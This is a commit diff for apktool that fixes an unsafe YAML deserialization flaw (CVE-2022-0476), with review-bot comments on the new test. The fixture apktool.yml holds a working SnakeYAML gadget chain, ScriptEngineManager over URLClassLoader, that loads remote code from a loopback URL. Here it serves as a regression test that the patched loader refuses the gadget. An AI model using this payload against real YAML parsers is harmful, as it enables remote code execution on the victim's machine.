Preventing instantiation of untrusted classes. (#2760 - CVE-2022-0476)
* fix: enforce allowable classes during yaml parsing * fix: rename class to reference escaping nature of strings * test: assertion for parsing malicious yaml
1 parent
a269a8e
commit 4065717
Showing
6 changed files
with
108 additions
and
6 deletions.
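--- a/brut.apktool/apktool-lib/src/test/java/brut/androlib/yaml/MaliciousYamlTest.java
+++ b/brut.apktool/apktool-lib/src/test/java/brut/androlib/yaml/MaliciousYamlTest.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2010 Ryszard Wiśniewski <brut.alll@gmail.com>
+ * Copyright (C) 2010 Connor Tumbleson <connor.tumbleson@gmail.com>
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package brut.androlib.yaml;
+
+import brut.androlib.Androlib;
+import brut.androlib.BaseTest;
+import brut.androlib.TestUtils;
+import brut.androlib.options.BuildOptions;
+import brut.common.BrutException;
+import brut.directory.ExtFile;
+import brut.util.OS;
+import org.junit.BeforeClass;
+import org.junit.Test;
+import org.yaml.snakeyaml.constructor.ConstructorException;
+
+import java.io.File;
+
+public class MaliciousYamlTest extends BaseTest {
+
+@BeforeClass
+public static void beforeClass() throws Exception {
+TestUtils.cleanFrameworkFile();
+
+sTmpDir = new ExtFile(OS.createTempDirectory());
+sTestNewDir = new ExtFile(sTmpDir, "cve20220476");
+LOGGER.info("Unpacking cve20220476...");
+TestUtils.copyResourceDir(MaliciousYamlTest.class, "yaml/cve20220476/", sTestNewDir);
+}
+
+@Test(expected = ConstructorException.class)
+public void testMaliciousYamlNotLoaded() throws BrutException {
+BuildOptions buildOptions = new BuildOptions();
+File testApk = new File(sTmpDir, "cve20220476.apk");
+new Androlib(buildOptions).build(sTestNewDir, testApk);
+}
+}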
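Review bot: `@Test(expected = ConstructorException.class)` on `testMaliciousYamlNotLoaded` accepts a ConstructorException raised for any reason, so the test cannot tell a refusal of the `!!javax.script.ScriptEngineManager` gadget from a refusal of the fixture's own `!!brut.androlib.meta.MetaInfo` root tag or from any other constructor failure inside `Androlib.build`; a regression that broke the allowlist in a different way could keep this test green. Catch the exception explicitly, `fail()` if nothing is thrown, and assert on whatever identifying detail the rejection carries (message or cause) so the refused tag is pinned — the allowlist enforcement itself lives in the files of this commit that are not shown here, so I cannot say what that detail is. Consider also a one-line comment above the test stating that the fixture's `some_var` is the CVE-2022-0476 gadget chain and that the expected failure must come from the YAML constructor, not from a later build step.
```java
@Test
public void testMaliciousYamlNotLoaded() throws BrutException {
    BuildOptions buildOptions = new BuildOptions();
    File testApk = new File(sTmpDir, "cve20220476.apk");
    try {
        new Androlib(buildOptions).build(sTestNewDir, testApk);
        fail("malicious !!javax.script.ScriptEngineManager tag was constructed");
    } catch (ConstructorException e) {
        // TODO(review): assert on the detail that names the refused class (message or cause)
        assertNotNull(e.getMessage());
    }
}
```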
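--- a/brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/AndroidManifest.xml
+++ b/brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/AndroidManifest.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.ibotpeaches.cve20220476" platformBuildVersionCode="30" platformBuildVersionName="11">
+<application android:debuggable="true" android:forceQueryable="true">
+</application>
+</manifest>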
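--- a/brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/apktool.yml
+++ b/brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/apktool.yml
@@ -0,0 +1,23 @@
+!!brut.androlib.meta.MetaInfo
+apkFileName: cve20220476.apk
+compressionType: false
+some_var: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://127.0.0.1:8000"]]]]
+doNotCompress:
+- resources.arsc
+isFrameworkApk: false
+packageInfo:
+forcedPackageId: '127'
+renameManifestPackage: null
+sdkInfo:
+minSdkVersion: '25'
+targetSdkVersion: '30'
+sharedLibrary: false
+sparseResources: false
+usesFramework:
+ids:
+- 1
+tag: null
+version: 2.6.1-ddc4bb-SNAPSHOT
+versionInfo:
+versionCode: null
+versionName: null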
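Review bot: The `some_var` line carries the live gadget chain for this CVE with no comment saying so, and a future maintainer tidying this fixture could reasonably delete or "fix" it; add `# some_var is the CVE-2022-0476 gadget chain (ScriptEngineManager over URLClassLoader); the test expects the loader to refuse it` above it. The URL is loopback (`https://127.0.0.1:8000`); it is worth stating in the same comment that it must stay on loopback, because if the allowlist ever regressed, ScriptEngineManager's service discovery through the URLClassLoader would contact that address during the test. Note also that the root tag `!!brut.androlib.meta.MetaInfo` must remain permitted for this fixture to exercise the intended rejection rather than failing on the first line. In this rendering the keys under `packageInfo`, `sdkInfo`, `usesFramework` and `versionInfo` show no indentation; I assume the committed file indents them, otherwise the document would not parse as a single MetaInfo mapping.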
If you are reading this commit and wondering why a wrong CVE was attached to it: the CVE was reserved for this issue, but it was later revoked and reused - https://huntr.dev/bounties/d2246081-21fc-4e68-9e04-5bb4095d3624/